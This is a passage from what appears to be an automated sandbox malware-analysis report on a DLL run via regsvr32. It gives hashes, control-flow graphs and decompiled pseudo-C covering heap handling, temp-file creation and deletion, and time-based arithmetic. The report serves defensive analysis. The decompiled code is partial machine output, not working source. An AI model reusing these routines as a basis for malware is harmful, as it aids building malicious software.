                  • Source File: 00000003.00000002.246392867.0000000001330000.00000040.00001000.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1330000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction ID: f07b47c6e03d4348a0a1fcead4c14b346447c9b3084d36ef9d004c5b8e4bb4c6
                  • Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction Fuzzy Hash: 18513C70A68748DFE7A4DB2CC05876A7BE5FBC8349F84891DB18BC7650D3348885CB4A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 314 1331c0b 315 1331c14-1331c19 call 1335141 314->315 316 1331d2e-1331d3b 314->316 325 1331d78-1331d83 315->325 317 1331d12-1331d1d 316->317 318 1331d3d-1331d4a 316->318 320 1331d02-1331d10 call 1334929 317->320 321 1331d1f-1331d2c call 1334929 317->321 322 1331d69-1331d72 318->322 323 1331d4c-1331d58 318->323 320->317 320->323 321->316 321->318 322->325 328 1331cf3-1331d00 call 1334e98 322->328 323->321 327 1331d5a-1331d64 323->327 330 1331d93-1331d9b 325->330 331 1331d85-1331d91 325->331 333 1331c7c-1331c86 327->333 328->320 342 1331ce8-1331cf1 call 1335141 328->342 330->331 336 1331d9d-1331da6 330->336 331->330 331->336 338 1331c29-1331cc6 333->338 339 1331c88-1331db4 call 1331db9 333->339 341 1331cda-1331cdb 336->341 352 1331cc8 338->352 353 1331ccd-1331cd5 338->353 344 1331cdf-1331dab 341->344 342->327 355 1331c45-1331c51 call 1333499 352->355 356 1331c62-1331c6b 352->356 353->341 353->355 359 1331c53-1331c60 355->359 360 1331c6f-1331c7a call 1335141 355->360 356->344 359->356 361 1331c97-1331ca1 359->361 360->333 360->359 364 1331ca7-1331cad 361->364 365 1331c1e-1331c27 RtlAllocateHeap 361->365 366 1331cb4-1331cb9 364->366 367 1331caf 364->367 365->364 366->339 367->315
                  Memory Dump Source
                  • Source File: 00000003.00000002.246392867.0000000001330000.00000040.00001000.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1330000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction ID: ef1abaabebf0f1625d49d68bed905a74c0ebbe169b2c354c901d1c4a15a1d74f
                  • Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction Fuzzy Hash: A7417274A18B8C8FEB94EB2CC45877A7BE5FBD9308FC85519E186C3650D734D8808B4A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 17%
                  			E00000001180006344(void* __ecx, void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, void* __r11) {
                  				void* _t74;
                  				signed long long _t75;
                  				int _t92;
                  				void* _t93;
                  				signed long long _t94;
                  				void* _t106;
                  				signed long long _t107;
                  				signed long long _t116;
                  				void* _t161;
                  				long long _t163;
                  				long long _t164;
                  				long long _t165;
                  				long long _t207;
                  				CHAR* _t210;
                  				long long _t216;
                  				long long* _t218;
                  				void* _t220;
                  				void* _t221;
                  				CHAR* _t245;
                  				CHAR* _t248;
                  				struct _FILETIME* _t255;
                  				void* _t256;
                  				long _t258;
                  				long long _t259;
                  
                  				_t161 = _t220;
                  				 *((long long*)(_t161 + 0x10)) = __rbx;
                  				 *((long long*)(_t161 + 0x18)) = _t216;
                  				 *((long long*)(_t161 + 0x20)) = __rsi;
                  				 *((long long*)(_t161 + 8)) = __rcx;
                  				_t221 = _t220 - 0x50;
                  				_t259 = __rcx;
                  				 *((long long*)(_t221 + 0x38)) =  *0x8000d490;
                  				_t163 =  *0x8000d4a0;
                  				_t6 =  &(_t210[0xa]); // 0xa
                  				r12d = r9d;
                  				_t256 = __r8;
                  				Sleep(_t258);
                  				GetSystemTimeAsFileTime(_t255);
                  				_t9 = _t221 + 0x30; // -78
                  				_t75 = E000000011800059FC(_t74, _t9);
                  				_t10 = _t221 + 0x30; // -78
                  				r11d = _t75;
                  				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                  				E000000011800066A8(__rbx, _t10, __rdx);
                  				 *((long long*)(_t221 + 0x40)) = _t163;
                  				if (_t163 == _t210) goto 0x8000667f;
                  				lstrlenA(_t248);
                  				lstrlenA(_t245);
                  				HeapAlloc(??, ??, ??);
                  				_t169 = _t163;
                  				if (_t163 == _t210) goto 0x80006671;
                  				lstrcpyA(_t210);
                  				if (__r8 == _t210) goto 0x80006456;
                  				if (r12d == 0) goto 0x80006456;
                  				_t164 =  *((intOrPtr*)(_t221 + 0x38));
                  				lstrcatA(??, ??);
                  				lstrcatA(??, ??);
                  				_t23 = _t221 + 0x48; // -54
                  				_t207 = _t163;
                  				if (E000000011800031D4(_t6, _t163, _t259, _t207,  *((intOrPtr*)(_t163 + 8)), __rdx, _t23) != 0) goto 0x80006663;
                  				_t218 =  *((intOrPtr*)(_t221 + 0xa0));
                  				 *_t218 =  *((intOrPtr*)(_t221 + 0x48));
                  				_t92 = lstrlenA(??);
                  				_t26 = _t207 + 0x34; // 0x34
                  				r8d = _t26;
                  				 *(_t218 + 0x10) = _t92;
                  				 *((intOrPtr*)(_t218 + 0x14)) = 1;
                  				_t93 = HeapAlloc(??, ??, ??);
                  				if (_t164 == _t210) goto 0x80006650;
                  				_t29 = _t221 + 0x30; // -78
                  				_t94 = E000000011800059FC(_t93, _t29);
                  				_t30 = _t221 + 0x30; // -78
                  				r11d = _t94;
                  				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                  				E000000011800066A8(_t163, _t30, _t207);
                  				 *((long long*)(_t221 + 0x48)) = _t164;
                  				if (_t164 == _t210) goto 0x80006642;
                  				0x8000a48e();
                  				HeapFree(??, ??, ??);
                  				 *((long long*)(_t218 + 8)) = _t164;
                  				if (_t256 == _t210) goto 0x8000669f;
                  				if (r12d == 0) goto 0x8000669f;
                  				_t165 = _t218 + 0x28;
                  				r8d = r12d;
                  				 *((long long*)(_t221 + 0x20)) = _t165;
                  				if (E00000001180001208(0, _t163,  *((intOrPtr*)(_t221 + 0x80)), _t256,  *((intOrPtr*)(_t163 + 8)), _t218, _t218 + 0x18) != 0) goto 0x80006642;
                  				r14d = 0x77;
                  				 *((intOrPtr*)(_t218 + 0x2c)) = 1;
                  				_t106 = HeapAlloc(??, ??, ??);
                  				if (_t165 == _t210) goto 0x80006642;
                  				_t48 = _t221 + 0x30; // -78
                  				_t107 = E000000011800059FC(_t106, _t48);
                  				_t49 = _t221 + 0x30; // -78
                  				r11d = _t107;
                  				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                  				_t116 = E000000011800066A8(_t169, _t49, _t256);
                  				 *((long long*)(_t221 + 0x48)) = _t165;
                  				if (_t165 == _t210) goto 0x80006634;
                  				0x8000a48e();
                  				r11d = _t116;
                  				r14d = r14d - r11d;
                  				 *((long long*)(_t221 + 0x20)) =  *((intOrPtr*)(_t221 + 0x38)) + 0x1800112af;
                  				0x8000a48e();
                  				 *((long long*)(_t218 + 0x20)) = _t165;
                  				HeapFree(??, ??, ??);
                  				goto 0x80006663;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				return 2;
                  			}



























                  0x180006344
                  0x180006347
                  0x18000634b
                  0x18000634f
                  0x180006353
                  0x180006360
                  0x18000636b
                  0x180006370
                  0x180006375
                  0x18000637c
                  0x180006383
                  0x180006386
                  0x18000638c
                  0x180006397
                  0x18000639d
                  0x1800063a2
                  0x1800063a7
                  0x1800063ac
                  0x1800063c6
                  0x1800063cd
                  0x1800063d5
                  0x1800063dd
                  0x1800063e6
                  0x1800063f2
                  0x180006405
                  0x18000640b
                  0x180006411
                  0x18000641d
                  0x18000642d
                  0x180006432
                  0x180006434
                  0x180006444
                  0x180006450
                  0x180006456
                  0x18000645b
                  0x180006468
                  0x180006473
                  0x18000647e
                  0x180006482
                  0x18000648d
                  0x18000648d
                  0x180006491
                  0x180006494
                  0x18000649b
                  0x1800064a7
                  0x1800064ad
                  0x1800064b2
                  0x1800064b7
                  0x1800064bc
                  0x1800064d6
                  0x1800064dd
                  0x1800064e2
                  0x1800064ea
                  0x18000650f
                  0x18000651e
                  0x180006524
                  0x18000652b
                  0x180006534
                  0x180006542
                  0x18000654a
                  0x180006550
                  0x18000655c
                  0x180006562
                  0x180006570
                  0x180006577
                  0x180006583
                  0x180006589
                  0x18000658e
                  0x180006593
                  0x180006598
                  0x1800065b2
                  0x1800065b9
                  0x1800065be
                  0x1800065c6
                  0x1800065e5
                  0x1800065f2
                  0x180006602
                  0x18000660f
                  0x180006614
                  0x180006623
                  0x18000662c
                  0x180006632
                  0x18000663c
                  0x18000664a
                  0x180006658
                  0x18000666b
                  0x180006679
                  0x18000669e

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
                  • String ID:
                  • API String ID: 4119021385-0
                  • Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
                  • Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 180008d78-180008dca call 180002370 409 1800090ee 406->409 410 180008dd0-180008df3 406->410 413 1800090f3-18000910c 409->413 411 180008f65 410->411 412 180008df9-180008e1a lstrlenA HeapAlloc 410->412 414 180008f6a-180008f7f HeapFree 411->414 415 1800090e4-1800090e9 412->415 416 180008e20-180008e38 memcpy 412->416 414->413 417 180008f85-180008fa5 call 180002370 414->417 415->414 418 180008e3c-180008e3f 416->418 417->409 424 180008fab-180008fc8 call 1800038f8 417->424 420 180008e41-180008e44 418->420 421 180008e46-180008e49 418->421 420->421 423 180008e4b-180008e4e 420->423 421->418 425 180008ecc 423->425 426 180008e50-180008e79 lstrlenA HeapAlloc 423->426 433 180008fd2-180008ff5 call 180002370 424->433 434 180008fca-180008fcc 424->434 428 180008ece 425->428 426->428 429 180008e7b 426->429 431 180008ed6-180008ed8 428->431 432 180008e7e-180008e85 429->432 435 180008eda-180008f03 call 18000958c 431->435 436 180008f4f-180008f5d HeapFree 431->436 437 180008e87-180008e8a 432->437 438 180008e99 432->438 452 180008ff7-18000902d call 18000958c memcpy 433->452 453 18000905e-180009081 call 180002370 433->453 434->409 434->433 450 180008f05 435->450 451 180008f09-180008f1b LeaveCriticalSection 435->451 436->411 442 180008e95-180008e97 437->442 443 180008e8c-180008e93 437->443 439 180008e9b-180008e9e 438->439 444 180008eb5-180008ec3 439->444 445 180008ea0-180008ea3 439->445 442->438 442->439 443->437 443->442 444->432 449 180008ec5-180008eca 444->449 448 180008ea6-180008ea9 445->448 454 180008eab-180008eae 448->454 455 180008eb0-180008eb3 448->455 449->431 450->451 457 180008f1d-180008f38 HeapFree * 2 451->457 458 180008f3e-180008f4d 451->458 462 180009043-180009058 LeaveCriticalSection HeapFree 452->462 463 18000902f-18000903e memset 452->463 453->413 464 180009083-180009099 call 1800038f8 453->464 454->444 454->455 455->448 457->458 458->414 462->453 463->462 464->413 467 18000909b-1800090a4 464->467 467->413 468 1800090a6-1800090e2 call 18000958c GetSystemTimeAsFileTime LeaveCriticalSection 467->468 468->413
                  C-Code - Quality: 38%
                  			E00000001180008D78(void* __ebx, void* __ecx, void* __edi, void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
                  				void* _t70;
                  				void* _t77;
                  				void* _t89;
                  				intOrPtr _t93;
                  				void* _t98;
                  				char _t99;
                  				void* _t118;
                  				long long* _t160;
                  				void* _t161;
                  				long long _t163;
                  				char* _t165;
                  				long long _t166;
                  				char* _t181;
                  				char* _t182;
                  				void* _t206;
                  				long long _t207;
                  				void* _t211;
                  				intOrPtr* _t212;
                  				int _t214;
                  				void* _t218;
                  				void* _t219;
                  				void* _t238;
                  				long _t241;
                  				long _t247;
                  				void* _t249;
                  				CHAR* _t256;
                  				long long _t257;
                  
                  				_t238 = _t218;
                  				 *((long long*)(_t238 + 8)) = __rbx;
                  				 *((long long*)(_t238 + 0x10)) = __rdx;
                  				_t219 = _t218 - 0x40;
                  				r13d =  *0x8000d498;
                  				_t212 = __rcx;
                  				 *((long long*)(_t219 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				if (E00000001180002370(__rdx, __rdx, _t238) != 0) goto 0x800090ee;
                  				_t207 =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				_t160 =  *_t212;
                  				 *((long long*)(_t219 + 0x98)) = _t160;
                  				 *((long long*)(_t219 + 0x28)) = _t207;
                  				if ( *((intOrPtr*)(_t219 + 0x20)) == 0) goto 0x80008f65;
                  				r8d = lstrlenA(_t256) + 1;
                  				HeapAlloc(_t249, _t247, _t241);
                  				_t257 = _t160;
                  				if (_t160 == 0) goto 0x800090e4;
                  				memcpy(_t206, _t211, _t214);
                  				_t165 = _t257;
                  				if ( *_t165 == 0x20) goto 0x80008e46;
                  				if ( *_t165 != 9) goto 0x80008e4b;
                  				_t166 = _t165 + 1;
                  				goto 0x80008e3c;
                  				if ( *_t166 == 0) goto 0x80008ecc;
                  				lstrlenA(??);
                  				asm("cdq");
                  				_t12 = _t160 + 1; // 0x1
                  				r8d = _t12;
                  				_t70 = HeapAlloc(??, ??, ??);
                  				if (_t160 == 0) goto 0x80008ece;
                  				_t98 =  *_t166;
                  				if (_t98 == 0) goto 0x80008e99;
                  				if (_t98 == 0x20) goto 0x80008e95;
                  				_t181 = _t166 + 1;
                  				_t99 =  *_t181;
                  				if (_t99 != 0) goto 0x80008e87;
                  				if (_t99 != 0) goto 0x80008e9b;
                  				if (_t181 == 0) goto 0x80008eb5;
                  				 *_t181 = 0;
                  				_t182 = _t181 + 1;
                  				if ( *_t182 == 0x20) goto 0x80008eb0;
                  				if ( *_t182 != 9) goto 0x80008eb5;
                  				goto 0x80008ea6;
                  				 *_t160 = _t166;
                  				_t161 = _t160 + _t207;
                  				if (_t182 + 1 != 0) goto 0x80008e7e;
                  				goto 0x80008ed6;
                  				if (0 == 0) goto 0x80008f4f;
                  				E0000000118000958C(_t70,  *((intOrPtr*)(_t219 + 0x98)) + 0x18);
                  				 *((long long*)(_t212 + 0x40)) = _t257;
                  				 *((long long*)(_t212 + 0x48)) =  *((intOrPtr*)(_t219 + 0x90));
                  				 *((intOrPtr*)(_t212 + 0x50)) = bpl;
                  				if ( *((char*)(_t212 + 0x70)) == 0) goto 0x80008f09;
                  				 *((char*)(_t212 + 0x70)) = 0;
                  				asm("lock and dword [esi+0x2c], 0xfffffffe");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t212 + 0x40)) == 0) goto 0x80008f3e;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80008f6a;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				if (0x57 != 0) goto 0x800090f3;
                  				if (E00000001180002370( *((intOrPtr*)(_t219 + 0x88)),  *((intOrPtr*)(_t219 + 0x20)), _t238) != 0) goto 0x800090ee;
                  				_t77 = E000000011800038F8(_t76, 0,  *((intOrPtr*)(_t219 + 0x20)), _t219 + 0x98);
                  				_t93 =  *((intOrPtr*)(_t219 + 0x98));
                  				if (_t77 != 0) goto 0x80008fd2;
                  				if (_t93 == 0) goto 0x800090ee;
                  				 *((intOrPtr*)(_t212 + 0x28)) = _t93;
                  				if (E00000001180002370( *((intOrPtr*)(_t219 + 0x88)),  *((intOrPtr*)(_t219 + 0x20)), _t238) != 0) goto 0x8000905e;
                  				_t39 = _t161 + 0x10; // 0x10
                  				_t89 = _t39;
                  				_t118 =  <  ?  *((void*)(_t219 + 0x90)) : _t89;
                  				E0000000118000958C(_t78,  *_t212 + 0x18);
                  				r8d = _t118;
                  				memcpy(??, ??, ??);
                  				if (_t118 - _t89 >= 0) goto 0x80009043;
                  				r8d = _t89 - _t118;
                  				memset(??, ??, ??);
                  				LeaveCriticalSection(??);
                  				HeapFree(??, ??, ??);
                  				r13d = r13d ^ 0x1a1a0866;
                  				if (E00000001180002370( *((intOrPtr*)(_t219 + 0x88)),  *((intOrPtr*)(_t219 + 0x20)), _t238) != 0) goto 0x800090f3;
                  				if (E000000011800038F8(_t83, 0,  *((intOrPtr*)(_t219 + 0x20)), _t219 + 0x98) == 0) goto 0x800090f3;
                  				if ( *((intOrPtr*)(_t219 + 0x98)) == 0) goto 0x800090f3;
                  				_t55 =  *_t212 + 0x18; // 0x28
                  				E0000000118000958C(_t84, _t55);
                  				GetSystemTimeAsFileTime(??);
                  				_t163 =  *((intOrPtr*)(_t219 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
                  				 *((long long*)(_t219 + 0x30)) = _t163;
                  				 *((long long*)(_t212 + 0x30)) = _t163;
                  				LeaveCriticalSection(??);
                  				goto 0x800090f3;
                  				goto 0x80008f6a;
                  				return 1;
                  			}






























                  0x180008d78
                  0x180008d7b
                  0x180008d7f
                  0x180008d8e
                  0x180008d99
                  0x180008daa
                  0x180008dbe
                  0x180008dca
                  0x180008ddc
                  0x180008de0
                  0x180008de3
                  0x180008deb
                  0x180008df3
                  0x180008e09
                  0x180008e0e
                  0x180008e14
                  0x180008e1a
                  0x180008e29
                  0x180008e35
                  0x180008e3f
                  0x180008e44
                  0x180008e46
                  0x180008e49
                  0x180008e4e
                  0x180008e53
                  0x180008e5c
                  0x180008e63
                  0x180008e63
                  0x180008e6b
                  0x180008e79
                  0x180008e7e
                  0x180008e85
                  0x180008e8a
                  0x180008e8c
                  0x180008e8f
                  0x180008e93
                  0x180008e97
                  0x180008e9e
                  0x180008ea0
                  0x180008ea3
                  0x180008ea9
                  0x180008eae
                  0x180008eb3
                  0x180008eb5
                  0x180008eba
                  0x180008ec3
                  0x180008eca
                  0x180008ed8
                  0x180008ee6
                  0x180008ef3
                  0x180008ef7
                  0x180008efb
                  0x180008f03
                  0x180008f05
                  0x180008f09
                  0x180008f12
                  0x180008f1b
                  0x180008f2a
                  0x180008f38
                  0x180008f4d
                  0x180008f57
                  0x180008f77
                  0x180008f7f
                  0x180008fa5
                  0x180008fba
                  0x180008fbf
                  0x180008fc8
                  0x180008fcc
                  0x180008fd5
                  0x180008ff5
                  0x180008ffa
                  0x180008ffa
                  0x18000900b
                  0x180009013
                  0x180009021
                  0x180009026
                  0x18000902d
                  0x18000903b
                  0x18000903e
                  0x180009048
                  0x180009058
                  0x18000905e
                  0x180009081
                  0x180009099
                  0x1800090a4
                  0x1800090a9
                  0x1800090ad
                  0x1800090b7
                  0x1800090cc
                  0x1800090d3
                  0x1800090d8
                  0x1800090dc
                  0x1800090e2
                  0x1800090e9
                  0x18000910c

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
                  • String ID:
                  • API String ID: 3273538229-0
                  • Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
                  • Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 520 180001844-180001874 521 18000187a-18000187d 520->521 522 180001a6f-180001a85 520->522 521->522 523 180001883-180001893 call 180007b04 521->523 526 180001899-1800018b3 GetTempPathW 523->526 527 180001a6a 523->527 528 180001a55 526->528 529 1800018b9-1800018cf HeapAlloc 526->529 527->522 530 180001a5a-180001a68 HeapFree 528->530 529->528 531 1800018d5-1800018e3 GetTempPathW 529->531 530->522 532 1800018e5-180001914 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 531->532 533 180001916-180001924 HeapFree 531->533 532->533 534 180001927-18000192a 532->534 533->534 534->528 535 180001930-180001935 534->535 536 180001938-18000194f StrChrW 535->536 537 180001951-180001962 536->537 538 180001964-180001972 lstrlenW 536->538 539 180001976-180001979 537->539 538->539 540 1800019a7-1800019ab 539->540 541 18000197b-180001986 539->541 544 1800019b9-1800019c4 540->544 545 1800019ad-1800019b7 540->545 542 180001988-18000198c 541->542 543 18000198e-180001997 541->543 542->543 546 180001999-18000199c 542->546 543->541 543->546 547 1800019c6-1800019e0 call 180009b7c 544->547 548 1800019ef-1800019f2 544->548 545->546 546->540 549 18000199e-1800019a5 546->549 552 180001a3c-180001a53 DeleteFileW HeapFree 547->552 555 1800019e2-1800019e8 547->555 551 1800019f4-180001a0d call 180003698 548->551 548->552 549->540 549->545 551->552 557 180001a0f-180001a36 call 180005bdc HeapFree 551->557 552->530 555->551 558 1800019ea 555->558 557->552 558->536
                  C-Code - Quality: 19%
                  			E00000001180001844(void* __eax, void* __ebx, void* __ecx, void* __edx, long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
                  				signed long long _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t28;
                  				int _t35;
                  				void* _t37;
                  				int _t56;
                  				int _t65;
                  				void* _t70;
                  				intOrPtr _t73;
                  				intOrPtr _t74;
                  				intOrPtr* _t97;
                  				signed long long _t98;
                  				intOrPtr* _t111;
                  				void* _t123;
                  				void* _t126;
                  				intOrPtr* _t127;
                  				intOrPtr* _t128;
                  				void* _t130;
                  				signed long long _t137;
                  				void* _t145;
                  				void* _t150;
                  
                  				_t99 = __rbx;
                  				_a8 = __rbx;
                  				_t97 =  *0x8000d4a0;
                  				r12d = 0;
                  				_t150 = __rcx;
                  				if (__rdx == _t145) goto 0x80001a6f;
                  				if ( *__rdx == r12b) goto 0x80001a6f;
                  				E00000001180007B04(__rbx, __rdx, _t123, _t126, _t130, __rdx);
                  				if (_t97 == _t145) goto 0x80001a6a;
                  				_t98 =  *0x8000d4a0;
                  				_t28 = GetTempPathW(??, ??);
                  				if (_t28 == r12d) goto 0x80001a55;
                  				HeapAlloc(??, ??, ??);
                  				if (_t98 == _t145) goto 0x80001a55;
                  				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
                  				GetSystemTimeAsFileTime(??);
                  				r8d = GetCurrentThreadId() ^ _a32;
                  				if (GetTempFileNameW(??, ??, ??, ??) != r12d) goto 0x80001927;
                  				_t137 = _t98;
                  				HeapFree(??, ??, ??);
                  				if (_t145 == _t145) goto 0x80001a55;
                  				_t127 = _t97;
                  				__imp__StrChrW();
                  				r8d = 0;
                  				if (_t98 == _t137) goto 0x80001964;
                  				_a16 = _t28;
                  				goto 0x80001976;
                  				_t111 = _t127;
                  				_t35 = lstrlenW(??);
                  				r8d = 0;
                  				_a16 = _t35;
                  				if (_t35 == r8d) goto 0x800019a7;
                  				_t11 = _t111 - 1; // -1
                  				_t65 = _t11;
                  				_t73 =  *((intOrPtr*)(_t127 + _t98 * 2));
                  				if (_t73 == 0x20) goto 0x8000198e;
                  				if (_t73 != 9) goto 0x80001999;
                  				_t56 = _t65;
                  				_a16 = _t65;
                  				if (_t65 != r8d) goto 0x8000197b;
                  				if (_t56 == r8d) goto 0x800019a7;
                  				_t74 =  *_t127;
                  				if (_t74 == 0x20) goto 0x800019ad;
                  				if (_t74 != 9) goto 0x800019b9;
                  				_t128 = _t127 + 2;
                  				_a16 = _t56 - 1;
                  				goto 0x80001999;
                  				 *((intOrPtr*)(_t128 + _t98 * 2)) = r8w;
                  				if ( *_t128 == r8w) goto 0x800019ef;
                  				_v72 = _t137;
                  				r9d = 0;
                  				_t37 = E00000001180009B7C(0x57, _t99, _t150, _t128, _t145, _t128,  *((intOrPtr*)(_t98 + 8)), _t145);
                  				if (_t37 != 0) goto 0x80001a3c;
                  				if (_t98 + 2 == 0) goto 0x800019f4;
                  				goto 0x80001938;
                  				if (_t37 != r8d) goto 0x80001a3c;
                  				if (E00000001180003698(_t56 - 1, _t37 - r8d, _t99, _t145,  &_a24,  *((intOrPtr*)(_t98 + 8)),  &_a16, _t98) != 0) goto 0x80001a3c;
                  				r9d = _a16;
                  				E00000001180005BDC(_t56 - 1, _t70, _t99, _t150, _t98 + 2,  *((intOrPtr*)(_t98 + 8)), _a24);
                  				HeapFree(??, ??, ??);
                  				DeleteFileW(??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a5a;
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a6f;
                  				return 8;
                  			}


























                  0x180001844
                  0x180001844
                  0x180001858
                  0x18000185f
                  0x180001869
                  0x180001874
                  0x18000187d
                  0x180001888
                  0x180001893
                  0x180001899
                  0x1800018a8
                  0x1800018b3
                  0x1800018c3
                  0x1800018cf
                  0x1800018e3
                  0x1800018ed
                  0x180001908
                  0x180001914
                  0x180001916
                  0x18000191e
                  0x18000192a
                  0x180001935
                  0x180001940
                  0x180001946
                  0x18000194f
                  0x18000195e
                  0x180001962
                  0x180001964
                  0x180001967
                  0x18000196d
                  0x180001972
                  0x180001979
                  0x18000197b
                  0x18000197b
                  0x18000197e
                  0x180001986
                  0x18000198c
                  0x18000198e
                  0x180001990
                  0x180001997
                  0x18000199c
                  0x18000199e
                  0x1800019a5
                  0x1800019ab
                  0x1800019ad
                  0x1800019b3
                  0x1800019b7
                  0x1800019bb
                  0x1800019c4
                  0x1800019c6
                  0x1800019cb
                  0x1800019d7
                  0x1800019e0
                  0x1800019e8
                  0x1800019ea
                  0x1800019f2
                  0x180001a0d
                  0x180001a0f
                  0x180001a22
                  0x180001a36
                  0x180001a3f
                  0x180001a4d
                  0x180001a53
                  0x180001a62
                  0x180001a68
                  0x180001a85

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
                  • String ID:
                  • API String ID: 2968359827-0
                  • Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
                  • Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 55%
                  			E00000001180005748(void* __ebx, void* __ecx, void* __edi, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
                  				void* __rdi;
                  				void* __rsi;
                  				signed int _t35;
                  				void* _t70;
                  				signed int _t72;
                  				void* _t82;
                  				char* _t115;
                  				signed long long _t118;
                  				char* _t126;
                  				void* _t144;
                  				void* _t147;
                  				char* _t149;
